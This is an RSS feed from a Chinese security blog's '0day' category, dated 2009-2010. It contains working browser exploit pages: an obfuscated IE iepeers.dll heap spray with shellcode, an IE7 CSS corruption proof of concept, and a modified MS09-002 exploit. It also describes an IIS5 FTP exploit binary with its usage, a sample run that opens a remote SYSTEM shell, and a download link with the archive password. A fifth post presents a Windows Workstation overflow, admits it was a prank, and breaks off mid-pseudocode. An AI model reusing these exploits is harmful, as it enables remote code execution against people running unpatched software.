<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[Friddy's罐子 - 0day]]></title>
<link>http://www.friddy.cn/</link>
<description><![CDATA[Pass my life through a hole ,then the hole became a sky.]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog3 v2.8]]></copyright>
<webMaster><![CDATA[root@friddy.cn(Friddy)]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>Friddy&#39;s罐子</title>
	<url>http://www.friddy.cn/images/logos.gif</url>
	<link>http://www.friddy.cn/</link>
	<description>Friddy&#39;s罐子</description>
</image>

			<item>
			<link>http://www.friddy.cn/article.asp?id=119</link>
			<title><![CDATA[Microsoft Internet Explorer iepeers.dll 样本]]></title>
			<author>root@friddy.cn(friddy)</author>
			<category><![CDATA[0day]]></category>
			<pubDate>Thu,11 Mar 2010 18:13:57 +0800</pubDate>
			<guid>http://www.friddy.cn/default.asp?id=119</guid>
		<description><![CDATA[&lt;html&gt;&lt;body&gt;<br/>&lt;button id=&#39;mybtn&#39; onclick=&#39;crash();&#39; style=&#39;display:none&#39;&gt;&lt;/button&gt;<br/>&lt;script language=&#39;javascript&#39;&gt;<br/>function myfun1(){<br/>&#160;&#160;&#160;&#160;var shellcode = unescape(&#39;%u9999%u96fd%u3f46%u4a9f%u4a4f%uf542%u3748%u4346%u9992%u99f5%u2f47%u924f%ud69f%u3f37%uf546%u3f49%ufdf8%u3f41%u9f43%ud646%ufd3f%u42f8%u4e98%u9190%ud697%u4837%u4e3f%uf54b%u9147%u91f9%uf93f%u4e90%u4e90%u9148%uf596%uf998%u9837%u4a93%u4391%ufd96%uf947%u97f9%u9837%u994f%u98f8%u2f41%u984e%u9098%uf548%u464e%u4742%uf548%u9b4b%u9146%u9793%u373f%u9f9b%uf548%u4840%u4690%ud640%uf92f%u9b46%u934b%u424a%u9848%uf84e%u49d6%u4992%u2ffd%u9093%u2f46%u409f%u909b%u9f43%u3ff5%u2f4e%u9399%u4b99%u46d6%u9342%uf94e%u904f%u4e90%u2ffc%u4f90%u2f42%u9ffc%u4349%uf846%ufc97%u4a37%u964e%u984f%uf83f%u3f3f%u3ff9%u933f%uf52f%u4f41%u4b2f%u4191%u4e96%u4047%uf8fc%u4a93%u9342%u4146%u9b4a%u4248%u4f9b%u993f%u434b%ufd93%uf598%uf5d6%u49f9%u423f%u9396%ufcd6%uf59f%u4943%u2f47%u4b2f%u4e49%u4f4f%uf82f%u9296%u9047%u9b43%u4942%u429b%u4e99%u9297%u374b%u9b4a%u4748%u464b%u4843%u9bf5%u9842%u2f91%u972f%u4241%u4991%u37f5%u9992%u9bd6%u3f9f%u91fc%u43fd%u9696%u93f5%u9640%u4740%u904e%u9037%u2f41%u914b%u4b48%ufc49%ufc9b%u3f40%u9297%u9297%u92f8%u439b%u4797%u9946%u9f47%uf5fc%u4f90%u49f9%u9141%u48f9%u9b2f%u434b%u9bd6%ufc49%u3792%u9048%u4898%u42f9%u4646%u9293%u4398%u4f4a%u374e%uf53f%u4893%u3742%ud640%u9746%u9090%uf541%u482f%u4f9b%u9242%uf547%u979b%u4a96%u90fc%u9249%u9b4b%u9b96%u9646%u494e%ufcf9%u4890%u9693%u4b92%u2f46%u3f43%u432f%u9246%u934a%u2ff5%u4893%ufd41%u2f90%u4b9f%u9292%u4e40%u9897%u4f41%u4849%u4ff8%u4b9f%u373f%u3f49%u904a%u4a3f%ud64f%uf993%u93fd%u4f4b%u992f%u4afc%uf596%u4a4e%u2f93%u9f48%u3f93%u49fd%u4896%u913f%u484b%u4a97%uf89f%ufc92%ufd90%ufc3f%u42fc%uf89f%u4192%uf92f%u962f%u4f4b%u4247%u4842%u984b%u439f%u4e9b%u404f%ud62f%u9991%u9143%u40f9%u3f93%u989b%u9391%u9f99%u9191%u49fd%u983f%u9b48%u46fc%u4b92%u4a91%ufc42%u939b%u4e97%u4242%u91f9%ufdf9%u2f2f%u434f%u3790%u9941%u4149%u2f98%u469f%u414e%u964f%u9b2f%uf5d6%u9b43%u9f42%ud649%ud6f8%u4a4b%u9649%u4647%u4b4f%u49f5%uf9f9%u4740%u47fd%u4e4e%u4a43%u9697%u4146%u9b4a%u984b%u904b%u99fd%ufdf9%u4890%uf52f%u46fd%u49f9%u9f9f%uf947%uf53f%u9037%u2f3f%u9290%u9041%u9fd6%u96f5%ufc98%u3ffd%u434f%u434a%u464e%uf993%u903f%u46fd%u9ff8%u4747%u3741%u4642%u9146%ud64b%u9797%u9691%u4ff9%u4991%u2f9b%ufc49%ud69f%u4b99%uf54f%u4a48%u414e%u434e%u3f48%u9349%u489b%u962f%u49f9%uf5fc%u4137%u3f37%u9047%uf992%ud69b%uf940%u4048%u4b41%u983f%u4793%u4099%u97fc%u4697%u4397%u99fc%u9098%u9f41%u9691%ud640%u9f9f%uf59b%u2ff5%u9140%u9197%u4340%u4f97%u9142%u9798%u9992%u3793%ud64e%u2f97%u96fd%ud6d6%u372f%udb93%ud9cc%u2474%ubaf4%ud1fb%ua5cf%u295e%ub1c9%u3133%u1956%uc683%u0304%u1556%u2419%u614e%u3589%u95ae%u52cd%u6ad8%ua32d%ue3bb%u92c8%u90e9%u8799%ud23d%u2bcf%ub6b5%ub8fb%u1ebb%u080c%u7971%u8923%u45b7%u49ef%u39d9%u9ded%u0339%ud03e%u4438%u1b22%u1d68%u8e29%u2a9d%u136f%ufc9f%u2be4%u79e7%udf3a%u835d%u706a%ucbe9%ufa92%uebb5%u2fa3%ud0a6%u44ea%ua21d%u8ced%u4b6f%uf0dc%u723c%ufcd1%ub23d%u1ed5%uc848%ua226%u0b4b%u7855%u8ed9%u0bfd%u6b79%ud8fc%uf81c%u95f2%ua66b%u2b16%udcbf%ua022%u333e%uf2a3%u9764%ua1e8%u8e05%u0754%ud039%uf830%u9a9f%uedd2%uc0a6%uf0b8%u7f2b%uf385%u8033%u9ba5%u0b02%udb2a%ude9a%u130f%u43d1%ubc39%u11bc%ua178%ucc3e%udcbe%ue5bc%u1b3e%u8fdc%u673b%u635a%uf831%u830f%uf9e6%ue005%u6a69%ue7c5&#39;);<br/>&#160;&#160;&#160;&#160;RlvzZEYyqXDyrSvnpasCPmbwnFhxrAtuMRPoDPQvG = new Array(); <br/>&#160;&#160;&#160;&#160;var hlaFYMOTReecXkoVGjZQCoWrfZwXTkEMeZAVRPcYoraj = 0x86000-(shellcode.length*2); <br/>&#160;&#160;&#160;&#160;var jlIZqNKPCHQCPQBWKDaqFudoJucQBKYWaQnJatZBlZTTDRfwLqgfMEZrVASdRY = unescape(&#39;%u0c0c%u0c0c&#39;); <br/>&#160;&#160;&#160;&#160;while(jlIZqNKPCHQCPQBWKDaqFudoJucQBKYWaQnJatZBlZTTDRfwLqgfMEZrVASdRY.length&lt;hlaFYMOTReecXkoVGjZQCoWrfZwXTkEMeZAVRPcYoraj/2) { jlIZqNKPCHQCPQBWKDaqFudoJucQBKYWaQnJatZBlZTTDRfwLqgfMEZrVASdRY+=jlIZqNKPCHQCPQBWKDaqFudoJucQBKYWaQnJatZBlZTTDRfwLqgfMEZrVASdRY; } <br/>&#160;&#160;&#160;&#160;var zMyiLPDAcKyxwnXuSUMgqjlcZgOGKUzNaaFYTOBIweLKVUxh = jlIZqNKPCHQCPQBWKDaqFudoJucQBKYWaQnJatZBlZTTDRfwLqgfMEZrVASdRY.substring(0,hlaFYMOTReecXkoVGjZQCoWrfZwXTkEMeZAVRPcYoraj/2); <br/>&#160;&#160;&#160;&#160;del&#101;te jlIZqNKPCHQCPQBWKDaqFudoJucQBKYWaQnJatZBlZTTDRfwLqgfMEZrVASdRY; <br/>&#160;&#160;&#160;&#160;for(ayEdmPtMHQQiQmKWsJuHANTu=0; ayEdmPtMHQQiQmKWsJuHANTu&lt;270; ayEdmPtMHQQiQmKWsJuHANTu++) { <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;RlvzZEYyqXDyrSvnpasCPmbwnFhxrAtuMRPoDPQvG[ayEdmPtMHQQiQmKWsJuHANTu] = zMyiLPDAcKyxwnXuSUMgqjlcZgOGKUzNaaFYTOBIweLKVUxh + zMyiLPDAcKyxwnXuSUMgqjlcZgOGKUzNaaFYTOBIweLKVUxh + shellcode; <br/>&#160;&#160;&#160;&#160;}<br/>}<br/>function crash(){<br/>&#160;&#160;&#160;&#160;myfun1();&nbsp;&nbsp;&nbsp;&nbsp;<br/>&#160;&#160;&#160;&#160;var CQqbQpYwnNgtviXfsHldLcQuPpqeARtmICXiaupKQzVieEZaMIHMcKMxQSkhxLISlBakYmlYjtVliXfcizLkbmOvNVtWbvLE = document.cr&#101;ateElement(&#39;body&#39;);<br/>&#160;&#160;&#160;&#160;CQqbQpYwnNgtviXfsHldLcQuPpqeARtmICXiaupKQzVieEZaMIHMcKMxQSkhxLISlBakYmlYjtVliXfcizLkbmOvNVtWbvLE.addBehavior(&#39;#default#userData&#39;);<br/>&#160;&#160;&#160;&#160;document.appendChild(CQqbQpYwnNgtviXfsHldLcQuPpqeARtmICXiaupKQzVieEZaMIHMcKMxQSkhxLISlBakYmlYjtVliXfcizLkbmOvNVtWbvLE);<br/>&#160;&#160;&#160;&#160;try {<br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;for (ayEdmPtMHQQiQmKWsJuHANTu=0; ayEdmPtMHQQiQmKWsJuHANTu&lt;10; ayEdmPtMHQQiQmKWsJuHANTu++) { <br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;CQqbQpYwnNgtviXfsHldLcQuPpqeARtmICXiaupKQzVieEZaMIHMcKMxQSkhxLISlBakYmlYjtVliXfcizLkbmOvNVtWbvLE.setAttribute(&#39;s&#39;,window);<br/>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;}<br/>&#160;&#160;&#160;&#160;} catch(e){ }&nbsp;&nbsp;&nbsp;&nbsp;<br/>&#160;&#160;&#160;&#160;window.status+=&#39;&#39;;<br/>}<br/><br/>document.getElementById(&#39;mybtn&#39;).onclick();<br/>&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;]]></description>
		</item>
		
			<item>
			<link>http://www.friddy.cn/article.asp?id=113</link>
			<title><![CDATA[南京铱迅发现微软IE7.0 异常CSS导致内存破坏漏洞]]></title>
			<author>root@friddy.cn(friddy)</author>
			<category><![CDATA[0day]]></category>
			<pubDate>Fri,20 Nov 2009 13:27:46 +0800</pubDate>
			<guid>http://www.friddy.cn/default.asp?id=113</guid>
		<description><![CDATA[详情请关注<br/><br/><a href="http://www.yxlink.com/newsview_15.html" target="_blank" rel="external"><a href="http://www.yxlink.com" target="_blank" rel="external">http://www.yxlink.com</a>/newsview_15.html</a><br/><br/>[Copy From yxlink.com]<br/><br/>+++++++++++++++++++++++++++++++++++++++++++++++++<br/><br/>1．漏洞介绍<br/>在XHTML 1.0标准下，使用特殊构造的CSS样式，在Internet Explorer 7.0 打开特定的网页后，Internet Explorer 7.0将发生内存崩溃，EIP指针将访问0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码，就可以执行任意命令。<br/> <br/>2．漏洞危害(危害等级高)<br/>黑客如果将含有“漏洞利用程序的网页”置于网站上，浏览过含有“漏洞利用程序的网页”的客户端将被运行特洛伊木马。<br/> <br/>3．通知途径<br/>已经向“国家漏洞库”提交。<br/> <br/>4．详细文档下载:&nbsp;&nbsp;[url]http://www.yxlink.com/download/[YV20090432]IE7vul.doc[/url]<br/> <br/>POC:<br/> <br/>&lt;!--<br/>请将以下内容粘贴到html文件中,成功后将跳出计算器程序<br/>南京铱迅信息技术有限公司（Nanjing Yxlink Information Technologies Co.,Ltd.）<br/><a href="http://www.yxlink.com" target="_blank" rel="external">http://www.yxlink.com</a><br/>--&gt;<br/>&lt;!DOCTYPE HTML PUBLIC &#34;-//W3C//DTD XHTML 1.0 Transitional//EN&#34; &#34;<a href="http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" target="_blank" rel="external">http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd</a>&#34;&gt;<br/>&lt;HTML xmlns=&#34;<a href="http://www.w3.org/1999/xhtml" target="_blank" rel="external">http://www.w3.org/1999/xhtml</a>&#34;&gt; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;HEAD&gt;<br/>&lt;script&gt;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;function load(){<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;var e;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;e=document.getElementsByTagName(&#34;STYLE&#34;)[0];<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;e.outerHTML=&#34;1&#34;; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/script&gt;&nbsp;&nbsp;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;STYLE type=&#34;text/css&#34;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;body{ overflow: scroll; margin: 0; }<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/style&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;SCRIPT language=&#34;javascript&#34;&gt;<br/>var shellcode = unescape(&#34;%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063&#34;);<br/>var bigblock = unescape(&#34;%u9090%u9090&#34;);<br/>var headersize = 20;<br/>var slackspace = headersize+shellcode.length;<br/>while (bigblock.length&lt;slackspace) bigblock+=bigblock;<br/>fillblock = bigblock.substring(0, slackspace);<br/>block = bigblock.substring(0, bigblock.length-slackspace);<br/>while(block.length+slackspace&lt;0x40000) block = block+block+fillblock;<br/>memory = new Array();<br/>for (x=0; x&lt;4000; x++) memory[x] = block + shellcode;<br/>&lt;/script&gt;<br/> <br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;/HEAD&gt;&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BODY onload=&#34;load()&#34;&gt;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&lt;/BODY&gt;<br/>&lt;/HTML&gt;]]></description>
		</item>
		
			<item>
			<link>http://www.friddy.cn/article.asp?id=103</link>
			<title><![CDATA[IIS5.0 FTP NLST Exploit  exe版]]></title>
			<author>root@friddy.cn(friddy)</author>
			<category><![CDATA[0day]]></category>
			<pubDate>Thu,03 Sep 2009 16:01:00 +0800</pubDate>
			<guid>http://www.friddy.cn/default.asp?id=103</guid>
		<description><![CDATA[好久不写exp了，大家凑活着用吧！~~~测试过win2000sp4英文版成功<br/><br/>IIS5.0 FTP NLST Exploit by friddy just for test<br/>usage: iisftpexp.exe &lt;dest ip&gt; &lt;dest port&gt; &lt;your ip&gt; &lt;ftp username&gt; &lt;ftp password&gt;<br/><br/>Sample:iisftpexp.exe 192.168.1.110 21 192.168.1.111 anonymous anonymous<br/>[-] Exiting...<br/><br/>============================================================================<br/>C:\&gt;iisftpexp.exe 192.168.1.110 21 192.168.1.111 anonymous anonymous<br/>IIS5.0 FTP NLST Exploit by friddy just for test<br/>open local port:24934<br/>[+] Connecting...<br/>[+] Sending USER...<br/>Try NLST<br/>try:telnet 192.168.1.110 4444<br/><br/>C:\&gt;telnet 192.168.1.110 4444<br/><br/>Microsoft Windows 2000 [Version 5.00.2195]<br/>(C) Copyright 1985-2000 Microsoft Corp.<br/><br/>C:\WINNT\system32&gt;<br/><br/>成功后telnet 对方的4444端口就能拿到个SYSTEM权限的cmdshell了<br/><br/>解压密码：friddy<br/><img src="http://www.friddy.cn/images/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/> <a href="http://www.friddy.cn/attachments/month_0909/420099316058.rar" target="_blank">点击下载此文件</a><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.friddy.cn/article.asp?id=84</link>
			<title><![CDATA[Internet Explorer 7.0 Exploit(MS09-002,可以执行任意代码)]]></title>
			<author>root@friddy.cn(friddy)</author>
			<category><![CDATA[0day]]></category>
			<pubDate>Thu,19 Feb 2009 12:30:39 +0800</pubDate>
			<guid>http://www.friddy.cn/default.asp?id=84</guid>
		<description><![CDATA[Microsoft IE CFunctionPointer函数内存破坏漏洞（MS09-002）<br/>发布时间:2009-02-10<br/>影响版本:<br/>Microsoft Internet Explorer 7.0 <br/><br/>漏洞描述:<br/>BUGTRAQ ID: 33627<br/>CVE(CAN) ID: CVE-2009-0075<br/><br/>Comment by Friddy:<br/>这个实际不是个破坏内存的漏洞，可以利用这个漏洞执行任意的代码。<br/>今天我花了十几分钟修改了miliw0rm的只会造成DOS的POC，现在已经可以较为稳定执行任意代码。<br/><br/>测试平台：<br/>Windows XP SP2+Internet Explorer 7.0<br/><br/>下面发出POC给各位安全爱好者测试，测试效果是弹出Windows的计算器（calc.exe）<br/><br/>&lt;!--<br/>MS09-002 Internet Exploere 7.0 Exploit<br/>Modify by Friddy 2009.02.19 mail:qianyang@ssyeah.com<br/>blog:www.friddy.cn<br/>Tested under Windows XP sp2+IE 7.0<br/>shellcode will popup the calc.exe<br/>--&gt;<br/><br/>&lt;script language=&#34;JavaScript&#34;&gt;<br/>var shellcode=unescape(&#34;%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063&#34;);<br/><br/>var array = new Array(); <br/><br/>var ls = 0x100000-(shellcode.length*2+0x01020); <br/><br/>var b = unescape(&#34;%u0D0D%u0D0D&#34;); <br/>while(b.length&lt;ls) { b+=b;} <br/>var lh = b.substring(0,ls/2); <br/>del&#101;te b; <br/><br/>for(i=0; i&lt;0xD0; i++) { <br/>&#160;&#160;&#160;&#160;array[i] = lh + shellcode;<br/>} <br/><br/>CollectGarbage();<br/><br/>var s1=unescape(&#34;%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA&#34;);<br/>var a1 = new Array();<br/>for(var x=0;x&lt;500;x++) a1.push(document.cr&#101;ateElement(&#34;img&#34;));<br/>o1=document.cr&#101;ateElement(&#34;tbody&#34;); <br/>o1.click; <br/>var o2 = o1.cloneNode();&#160;&#160;&#160;&#160;<br/>o1.clearAttributes(); <br/>o1=null; CollectGarbage(); <br/>for(var x=0;x&lt;a1.length;x++) a1[x].src=s1; <br/>o2.click;<br/>&lt;/script&gt;<br/><br/><br/>解压密码：friddy<br/><img src="http://www.friddy.cn/images/download.gif" alt="下载文件" style="margin:0px 2px -4px 0px"/> <a href="http://www.friddy.cn/attachments/month_0902/620092191334.rar" target="_blank">点击下载此文件</a><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.friddy.cn/article.asp?id=66</link>
			<title><![CDATA[Windows WorkStation Remote BufferOverflow(0day)]]></title>
			<author>root@friddy.cn(friddy)</author>
			<category><![CDATA[0day]]></category>
			<pubDate>Sun,04 Jan 2009 13:21:05 +0800</pubDate>
			<guid>http://www.friddy.cn/default.asp?id=66</guid>
		<description><![CDATA[<span style="color:Red">本来只想在自己的blog里面写个漏洞，测试下几个徒弟和朋友的水平的，还有部分原因在此不方便说。谁知前几日访问量较大，被转载到国内外<br/>的N多的XX站，竟然还被一些“大牛蛙”拿过去研究，当然还有部分伪黑客们和网络狗仔队之徒，一试便知。来看的人里面，能统计到的，<br/>不乏wei软公司（貌似看了一遍又一遍，赞一下）、大陆&amp;taiwan的“大牛蛙”（例如scz牛，lake2的朋友.....）、国外的“巨牛”(米国、棒棒们、罗马尼亚、法国、德国的xxx)等等。<br/><br/>现在结果已经明朗，这个漏洞有几个问题：<br/>1.根本就不是stack overflow,和部分人开了个小玩笑<br/>2.远程不可以利用（估计只有真正去朔源的真正的“大牛蛙们”才能明白）<br/>3.0day是有的，但是不在这里<br/><br/>所以想搞EXP或者POC的人，以下的内容可以忽略了<br/><br/>下面附上RPC分析方法一文，见笑了！想免费搞0day，想0day想疯的人，也不必看了！<br/><span style="font-size:16pt"></span><a target="_blank" href="http://www.friddy.cn/article.asp?id=68" rel="external">《RPC漏洞的通用分析方法》 </a></span><br/><br/><br/>Warning:<br/>This is not a real bufferoverflow ,just for test!!!You needn&#39;t to pay attention again!<br/>以下内容纯属虚构，如有雷同实属巧合&nbsp;&nbsp;&nbsp;&nbsp;||&nbsp;&nbsp;&nbsp;&nbsp;이 사실이 허점이되지 않습니다&nbsp;&nbsp;&nbsp;&nbsp; ||&nbsp;&nbsp;&nbsp;&nbsp;これは本当の抜け道ではない<br/>###############万恶的分割线#############################################<br/><span style="color:Blue">新春到！庆新年！送0day！<br/><br/>Microsoft Windows WorkStation 服务(windows xp sp3)存在栈溢出漏洞。<br/>a5这个参数,由于在执行wcscpy的字符串拷贝前，没有校验字符串的长度，因此会诱发栈缓冲区溢出（Stack Overflow） ，成功利用可以远程执行任意代码。<br/><br/>存在漏洞DLL 文件： wkssvc 或者 wkssvc.dll<br/>DLL 名称： Network Workstation service library<br/>描述： <br/>wkssvc.dll是本地系统进行远程文件打印相关服务文件。<br/><br/>属于： Windows <br/>系统 DLL文件： 是<br/><br/><br/>分析如下（伪代码）：<br/>/*<br/>Found by Friddy 12.25<br/>Email:qianyang@ssyeah.com<br/><a href="http://www.friddy.cn" target="_blank" rel="external">http://www.friddy.cn</a><br/>*/<br/>DWORD __userpurge sub_76854A96&lt;eax&gt;(int a1&lt;eax&gt;, HLOCAL *a2&lt;esi&gt;, int a3, wchar_t *a4,[color=Red]wchar_t *a5</span>,int a6, int a7, int a8)<br/>{<br/>&nbsp;&nbsp;int v8; // eax@1<br/>&nbsp;&nbsp;int v9; // ebx@1<br/>&nbsp;&nbsp;HLOCAL v10; // eax@3<br/>&nbsp;&nbsp;HLOCAL v11; // eax@4<br/>&nbsp;&nbsp;HLOCAL v12; // eax@7<br/>&nbsp;&nbsp;HLOCAL v13; // edi@7<br/>&nbsp;&nbsp;int v15; // ecx@4<br/>&nbsp;&nbsp;int v16; // edx@4<br/>&nbsp;&nbsp;int v17; // eax@4<br/>&nbsp;&nbsp;char v18; // zf@4<br/>&nbsp;&nbsp;wchar_t *v19; // ST0C_4@5<br/><br/>&nbsp;&nbsp;v9 = a1;<br/>&nbsp;&nbsp;v8 = 0;<br/>&nbsp;&nbsp;if ( a4 )<br/>&nbsp;&nbsp;&nbsp;&nbsp;v8 = *(_WORD *)(a7 + 2);<br/>&nbsp;&nbsp;v10 = LocalAlloc(0x40u, v8 + ((2 * v9 + 39) &amp; 0xFFFFFFFE));<br/>&nbsp;&nbsp;*a2 = v10;<br/>&nbsp;&nbsp;if ( v10 )<br/>&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;*(_DWORD *)v10 = 0;<br/>&nbsp;&nbsp;&nbsp;&nbsp;v15 = a3;<br/>&nbsp;&nbsp;&nbsp;&nbsp;v16 = a8;<br/>&nbsp;&nbsp;&nbsp;&nbsp;*((_DWORD *)*a2 + 3) = v9;<br/>&nbsp;&nbsp;&nbsp;&nbsp;*((_DWORD *)*a2 + 4) = 1;<br/>&nbsp;&nbsp;&nbsp;&nbsp;*((_DWORD *)*a2 + 5) = v15;<br/>&nbsp;&nbsp;&nbsp;&nbsp;v17 = dword_7686F588;<br/>&nbsp;&nbsp;&nbsp;&nbsp;*((_DWORD *)*a2 + 6) = dword_7686F588;<br/>&nbsp;&nbsp;&nbsp;&nbsp;v18 = a4 == 0;<br/>&nbsp;&nbsp;&nbsp;&nbsp;*((_DWORD *)*a2 + 8) = v16;<br/>&nbsp;&nbsp;&nbsp;&nbsp;dword_7686F588 = (v17 + 1) &amp; 0x7FFFFFFF;<br/>&nbsp;&nbsp;&nbsp;&nbsp;v11 = *a2;<br/>&nbsp;&nbsp;&nbsp;&nbsp;if ( v18 )<br/>&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*((_DWORD *)v11 + 2) = 0;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*((_DWORD *)*a2 + 7) = 0;<br/>&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;else<br/>&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;v19 = a4;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*((_DWORD *)v11 + 2) = (char *)v11 + 36;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;wcscpy(*((wchar_t **)*a2 + 2), v19);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*((_DWORD *)*a2 + 7) = (unsigned int)(*a2 + 2 * v9 + 39) &amp; 0xFFFFFFFE;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;wcscpy(*((wchar_t **)*a2 + 7), *(const wchar_t **)(a7 + 4));<br/>&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;if ( !a5 )<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return 0;<br/>&nbsp;&nbsp;&nbsp;&nbsp;v12 = LocalAlloc(0x40u, 2 * a6 + 12);<br/>&nbsp;&nbsp;&nbsp;&nbsp;v13 = v12;<br/>&nbsp;&nbsp;&nbsp;&nbsp;if ( v12 )<br/>&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;<span style="color:Red"> <span style="font-size:12pt"> wcscpy((wchar_t *)v12 + 4, a5);</span></span>//栈溢出发生在这里<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*((_DWORD *)v13 + 1) = a6;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*(_DWORD *)v13 = 1;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*((_DWORD *)*a2 + 1) = v13;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return 0;<br/>&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;LocalFree(*a2);<br/>&nbsp;&nbsp;}<br/>&nbsp;&nbsp;return GetLastError();<br/>}<br/><br/>###############################################################################################################################################################################################################<br/>//----- (7685499D) --------------------------------------------------------<br/>signed int __stdcall sub_7685499D(int a1, int a2, wchar_t *a3, int a4, wchar_t *a5, int a6, int a7, int a8)<br/>{<br/>&nbsp;&nbsp;signed int v8; // edi@1<br/>&nbsp;&nbsp;DWORD v9; // eax@2<br/>&nbsp;&nbsp;wchar_t *v10; // ecx@7<br/>&nbsp;&nbsp;int v12; // eax@21<br/>&nbsp;&nbsp;int v13; // [sp+14h] [bp-4h]@1<br/>&nbsp;&nbsp;int v14; // [sp+10h] [bp-8h]@1<br/>&nbsp;&nbsp;int v15; // [sp+Ch] [bp-Ch]@2<br/><br/>&nbsp;&nbsp;v8 = 0;<br/>&nbsp;&nbsp;v13 = 0;<br/>&nbsp;&nbsp;v14 = 0;<br/>&nbsp;&nbsp;if ( !(unsigned __int8)RtlAcquireResourceExclusive(&amp;unk_7686F3E4, 1) )<br/>&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;v8 = 2140;<br/>&nbsp;&nbsp;&nbsp;&nbsp;goto LABEL_18;<br/>&nbsp;&nbsp;}<br/>&nbsp;&nbsp;v9 = sub_76852B71((int)&amp;dword_7686F3E0, a1, (int)&amp;v15, 1);<br/>&nbsp;&nbsp;if ( v9 )<br/>&nbsp;&nbsp;&nbsp;&nbsp;goto 